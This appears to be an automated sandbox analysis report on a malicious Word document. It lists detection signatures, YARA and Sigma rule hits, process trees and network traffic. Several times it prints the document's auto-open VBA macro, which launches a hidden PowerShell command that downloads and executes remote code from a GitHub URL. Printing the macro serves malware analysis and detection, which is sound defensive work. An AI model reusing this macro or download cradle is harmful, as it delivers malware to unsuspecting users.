
Windows Analysis Report RfORrHIRNe

Overview

General Information

Sample Name: RfORrHIRNe (renamed file extension from none to doc)
Analysis ID: 515215
MD5: 955d5d2855b291a3cf1fc6655bbbbb79
SHA1: b58901cf8967310228bc6e4c224b2cfaf014bc65
SHA256: 63acfd6633bf3fe6462d8de72904338e2a97392654d8b39a97d18b9e7f3b25b8

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Document contains an embedded VBA macro which may execute processes
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Machine Learning detection for sample
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Stores large binary data to the registry
Document contains an embedded VBA macro which executes code when the document is opened / closed
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Document contains no OLE stream with summary information
Sigma detected: PowerShell Download from URL
Potential document exploit detected (unknown TCP traffic)
Document contains embedded VBA macros
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2096 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • powershell.exe (PID: 2432 cmdline: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: RfORrHIRNe.doc
Rule: PowerShell_in_Word_Doc (author: Florian Roth)
Description: Detects a powershell and bypass keyword in a Word document
Strings:
  • 0x72c7:$s1: Powershell.exe
  • 0x72f1:$s2: Bypass

Source: RfORrHIRNe.doc
Rule: PowerShell_Susp_Parameter_Combo (author: Florian Roth)
Description: Detects PowerShell invocation with suspicious parameters
Strings:
  • 0x72e0:$sb1: -W Hidden
  • 0x72d5:$sc1: -NoP
  • 0x72da:$sd1: -NonI
  • 0x72ea:$se2: -Exec Bypass
  • 0x72ea:$se4: -Exec Bypass

Dropped Files

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp
Rule: PowerShell_in_Word_Doc (author: Florian Roth)
Description: Detects a powershell and bypass keyword in a Word document
Strings:
  • 0x1047:$s1: Powershell.exe
  • 0x1071:$s2: Bypass

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp
Rule: PowerShell_Susp_Parameter_Combo (author: Florian Roth)
Description: Detects PowerShell invocation with suspicious parameters
Strings:
  • 0x1060:$sb1: -W Hidden
  • 0x1055:$sc1: -NoP
  • 0x105a:$sd1: -NonI
  • 0x106a:$se2: -Exec Bypass
  • 0x106a:$se4: -Exec Bypass

Source: C:\Users\user\AppData\Local\Temp\~DFA094A62AA4BA8959.TMP
Rule: PowerShell_in_Word_Doc (author: Florian Roth)
Description: Detects a powershell and bypass keyword in a Word document
Strings:
  • 0x2c33:$s1: Powershell.exe
  • 0x2c5d:$s2: Bypass

Source: C:\Users\user\AppData\Local\Temp\~DFA094A62AA4BA8959.TMP
Rule: PowerShell_Susp_Parameter_Combo (author: Florian Roth)
Description: Detects PowerShell invocation with suspicious parameters
Strings:
  • 0x2c4c:$sb1: -W Hidden
  • 0x2c41:$sc1: -NoP
  • 0x2c46:$sd1: -NonI
  • 0x2c56:$se2: -Exec Bypass
  • 0x2c56:$se4: -Exec Bypass

Memory Dumps

Source: 00000001.00000002.418320805.0000000000250000.00000004.00000020.sdmp
Rule: PowerShell_Susp_Parameter_Combo (author: Florian Roth)
Description: Detects PowerShell invocation with suspicious parameters
Strings:
  • 0x3039:$sb1: -W Hidden
  • 0x302e:$sc1: -NoP
  • 0x3033:$sd1: -NonI
  • 0x3043:$se2: -Exec Bypass
  • 0x3043:$se4: -Exec Bypass

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
Data: Command: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2096, ProcessCommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), ProcessId: 2432

Sigma detected: PowerShell Download from URL
Source: Process started | Author: Florian Roth, oscd.community, Jonhnathan Ribeiro
Data: Command: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2096, ProcessCommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), ProcessId: 2432

Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Source: Process started | Author: James Pemberton / @4A616D6573
Data: Command: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2096, ProcessCommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), ProcessId: 2432

Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data: Command: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2096, ProcessCommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), ProcessId: 2432

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: RfORrHIRNe.doc | Virustotal: Detection: 49%
Antivirus / Scanner detection for submitted sample
Source: RfORrHIRNe.doc | Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\~DFA094A62AA4BA8959.TMP | Avira: detection malicious, Label: HEUR/Macro.Downloader.MRQR.Gen
Machine Learning detection for sample
Source: RfORrHIRNe.doc | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic | DNS query: name: github.com
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 140.82.121.3:80
Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 140.82.121.3:443
Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: global traffic | HTTP traffic detected: GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1, Host: github.com, Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ssbb36/stv/main/5.mp3 HTTP/1.1, Host: raw.githubusercontent.com, Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1, Host: github.com, Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 185.199.108.133 185.199.108.133
Source: Joe Sandbox View | IP Address: 140.82.121.3 140.82.121.3
Source: unknown | HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown | Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49166 -> 443
Source: powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000001.00000002.418391747.000000000031B000.00000004.00000020.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000001.00000002.424410847.000000001B7D1000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000001.00000002.422084505.0000000003603000.00000004.00000001.sdmp | String found in binary or memory: http://github.co
Source: powershell.exe, 00000001.00000002.422084505.0000000003603000.00000004.00000001.sdmp | String found in binary or memory: http://github.com
Source: powershell.exe, 00000001.00000002.422084505.0000000003603000.00000004.00000001.sdmp | String found in binary or memory: http://github.com/ssbb36
Source: powershell.exe, 00000001.00000002.422084505.0000000003603000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp | String found in binary or memory: http://github.com/ssbb36/stv/raw
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp | String found in binary or memory: http://github.com/ssbb36/stv/raw/main/2.mp3
Source: powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmp | String found in binary or memory: http://github.com/ssbb36/stv/raw/main/2.mp3PE
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp | String found in binary or memory: http://github.com/ssbb36/stv/raw/main/3.mp3
Source: powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmp | String found in binary or memory: http://github.com/ssbb36/stv/raw/main/3.mp3PE
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp | String found in binary or memory: http://github.com/ssbb36/stv/raw/main/4.mp3
Source: powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmp | String found in binary or memory: http://github.com/ssbb36/stv/raw/main/4.mp3PE
Source: RfORrHIRNe.doc, ~DFA094A62AA4BA8959.TMP.0.dr | String found in binary or memory: http://github.com/ssbb36/stv/raw/main/5.mp3
Source: powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmp | String found in binary or memory: http://github.com/ssbb36/stv/raw/main/5.mp3PE
Source: powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000001.00000002.425190058.000000001CEB7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000001.00000002.425190058.000000001CEB7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000001.00000002.424410847.000000001B7D1000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000001.00000002.418391747.000000000031B000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000001.00000002.418738530.0000000002360000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000001.00000002.425190058.000000001CEB7000.00000002.00020000.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000001.00000002.425190058.000000001CEB7000.00000002.00020000.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000001.00000002.418738530.0000000002360000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: powershell.exe, 00000001.00000002.425190058.000000001CEB7000.00000002.00020000.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000001.00000002.418333433.000000000028E000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://wT
Source: powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp | String found in binary or memory: https://github.c
Source: powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmp | String found in binary or memory: https://github.com
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/ssbb3
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/ssbb36/stv/ra
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/ssbb36/stv/raw/main/1.mp3
Source: powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/ssbb36/stv/raw/main/1.mp3PE
Source: powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/ssbb36/stv/raw/main/5.mp3
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp | String found in binary or memory: https://notebooks.githubusercontent.com
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp | String found in binary or memory: https://raw.githubuserco
Source: powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmp | String found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp | String found in binary or memory: https://raw.githubusercontent.com/ssbb36/stv/main/5.mp3
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp | String found in binary or memory: https://render.githubusercontent.com
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp | String found in binary or memory: https://viewscreen.githubusercontent.com
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BC62BE70-F984-485F-A938-51B492D77752}.tmp
Source: unknown | DNS traffic detected: queries for: github.com
Source: global traffic | HTTP traffic detected: GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1, Host: github.com, Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ssbb36/stv/main/5.mp3 HTTP/1.1, Host: raw.githubusercontent.com, Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1, Host: github.com, Connection: Keep-Alive

System Summary:

Document contains an embedded VBA macro which may execute processes
Source: ~DFA094A62AA4BA8959.TMP.0.dr | OLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
Document contains an embedded VBA macro with suspicious strings
Source: RfORrHIRNe.doc | OLE, VBA macro line: Shell ("Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')")
Source: VBA code instrumentation | OLE, VBA macro: Module NewMacros, Function Autoopen, String powershell: Shell ("Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')")
Source: ~DFA094A62AA4BA8959.TMP.0.dr | OLE, VBA macro line: JbxHook_Shell_1_ 3, ("Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')")
Source: RfORrHIRNe.doc, type: SAMPLE | Matched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
Source: RfORrHIRNe.doc, type: SAMPLE | Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: 00000001.00000002.418320805.0000000000250000.00000004.00000020.sdmp, type: MEMORY | Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp, type: DROPPED | Matched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp, type: DROPPED | Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: C:\Users\user\AppData\Local\Temp\~DFA094A62AA4BA8959.TMP, type: DROPPED | Matched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
Source: C:\Users\user\AppData\Local\Temp\~DFA094A62AA4BA8959.TMP, type: DROPPED | Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: ~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp.0.dr | OLE indicator application name: unknown
Source: ~DFA094A62AA4BA8959.TMP.0.dr | OLE indicator application name: unknown
Source: RfORrHIRNe.doc | OLE, VBA macro line: Sub Autoopen()
Source: VBA code instrumentation | OLE, VBA macro: Module NewMacros, Function Autoopen
Source: ~DFA094A62AA4BA8959.TMP.0.dr | OLE, VBA macro line: Sub Autoopen()
Source: ~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFA094A62AA4BA8959.TMP.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp.0.dr | OLE indicator has summary info: false
Source: ~DFA094A62AA4BA8959.TMP.0.dr | OLE indicator has summary info: false
Source: RfORrHIRNe.doc | OLE indicator, VBA macros: true
Source: ~DFA094A62AA4BA8959.TMP.0.dr | OLE indicator, VBA macros: true
Source: RfORrHIRNe.doc | Virustotal: Detection: 49%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................#...............................................`I.........v.....................K......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....#.................Sj.... #..............................}..v.....#......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w..../...............P.Sj....P.W.............................}..v....h*......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w..../.................Sj.... +..............................}..v.....+......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....;...............P.Sj....P.W.............................}..v.....1......0.......................~.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....;.................Sj.....1..............................}..v....@2......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....G.......A.t. .l.i.n.e.:.2. .c.h.a.r.:.1.8...............}..v....P6......0.................W.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....G.................Sj.....7..............................}..v.....7......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....S...............P.Sj....P.W.............................}..v....P>......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....S.................Sj.....?..............................}..v.....?......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w...._.......u.t.F.i.l.e. .".t.e.m.p.5.4.6.8.5.".............}..v.....C......0.................W.....$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w...._.................Sj....PD..............................}..v.....D......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....k...............P.Sj....P.W.............................}..v.....K......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....k.................Sj....PL..............................}..v.....L......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....w....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n......Q......0.................W.....4.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....w.................Sj.....Q..............................}..v....8R......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....................P.Sj....P.W.............................}..v....xW......0.......................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w......................Sj....0X..............................}..v.....X......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w............ .......P.Sj....P.W.............................}..v....@\......0.................W.............................
